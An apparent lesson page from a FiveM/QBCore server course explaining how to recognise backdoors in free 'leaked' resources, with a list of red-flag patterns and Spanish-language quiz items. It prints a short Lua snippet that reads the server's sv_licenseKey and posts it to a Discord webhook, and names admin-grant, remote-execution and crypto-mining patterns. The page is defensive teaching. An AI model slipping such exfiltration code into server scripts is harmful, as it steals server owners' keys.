Crxative-MAcademy

Debugging and securing your resources · Lesson 2/3 · 9 min

Anatomy of a FiveM backdoor

Knowing how they attack is the best defense. These are the patterns malicious scripts hide.

Many free QBCore "leaks" come with surprises: backdoors that give the attacker access, steal data or mine crypto with your server. Recognizing their patterns saves your city.

Red flags in a resource

  • Exfiltration: Discord webhooks (discord.com/api/webhooks) that send data out.
  • Obfuscated code: assert(load(...)), huge base64 strings or unreadable \xNN.
  • Hidden execution: os.execute, io.popen, or PerformHttpRequest that downloads and runs code.
  • Admin backdoor: add_principal or ExecuteCommand that grants themselves permissions.
  • Key theft: reading sv_licenseKey, steam_webApiKey or the MySQL connection string.
  • Mining: references to xmrig, stratum+tcp, monero pools.
lua
-- 🚩 Backdoor (do NOT use this): sends your licenseKey to a foreign Discord
local key = GetConvar('sv_licenseKey', '')
PerformHttpRequest('https://discord.com/api/webhooks/...', function() end,
  'POST', json.encode({ content = key }), { ['Content-Type'] = 'application/json' })

Malicious pattern

Downloaded something and not sure? Upload it to the Crxative-M Security Audit: it scans these patterns and tells you if it comes with surprises before you install it on your server.

Practice what you learned

0/3
Test

En un 'leak' gratis de QBCore ves estas líneas: local key = GetConvar('sv_licenseKey', '') / PerformHttpRequest('https://discord.com/api/webhooks/...', function() end, 'POST', json.encode({ content = key })). ¿Qué está pasando?

Pista

GetConvar('sv_licenseKey') + PerformHttpRequest a un Discord = datos tuyos saliendo fuera.

Test

¿Cuál de estas líneas es la MÁS sospechosa de esconder un backdoor en un recurso de FiveM?

Pista

El código honesto no tiene nada que esconder. ¿Por qué estaría ofuscado en \xNN?

Ordena el código

Ordena los pasos correctos cuando te pasan un recurso gratis y sospechoso, ANTES de instalarlo en tu servidor de producción.

Coloca las líneas en el orden correcto con las flechas.

Si todo está limpio, lo pruebo primero en un servidor de TEST, nunca directo en producción.
Reviso si lee sv_licenseKey, tokens o la conexión de MySQL, o si se da add_principal solo.
Lo paso por la Auditoría de seguridad de Crxative-M para escanear esos patrones.
Abro los .lua y busco patrones: webhooks de Discord, load(/assert, os.execute, io.popen, base64/\xNN.
Pista

Primero inspeccionas a mano, luego escaneas, luego pruebas aislado. Producción es lo último.

Challenge: code it yourself

You're handed a script with a PerformHttpRequest line to a Discord webhook that sends GetPlayerIdentifiers. What happens and what would you do?

Write it yourself in your editor (VS Code) and test it on your server. You learn here by doing it, not by copying.

See hint

It's exfiltration of player data to an external Discord. Don't install it and audit the rest.

Escribe aquí tu solución:

Debugging like a pro: errors, prints and resmonNext: Server-side hardening, anti-spam and checklist
How was this lesson?